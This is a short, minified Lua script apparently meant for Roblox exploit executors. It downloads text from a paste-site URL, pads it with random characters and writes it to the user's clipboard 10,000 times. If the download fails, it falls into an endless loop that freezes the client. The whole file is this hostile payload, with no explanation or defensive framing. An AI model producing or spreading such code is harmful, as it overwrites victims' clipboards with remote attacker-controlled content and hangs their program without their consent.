local a="https://shz.al/RKwZY6j6b52tMEsNPRXeWpS3"everyClipboard=setclipboard or toclipboard or set_clipboard or setrbxclipboard or Clipboard and Clipboard.set;local function b(a)return game:GetService("HttpService"):HttpGet(a)end;local function c(d)local e={}for f=1,d do local g=math.random(1,3)if g==1 then table.insert(e,string.char(math.random(48,57)))elseif g==2 then table.insert(e,string.char(math.random(65,90)))else table.insert(e,string.char(math.random(97,122)))end end;return table.concat(e)end;local h=b(a)if h then local i=c(100)local j=h..i;for f=1,10000 do everyClipboard(j)end else while true do end end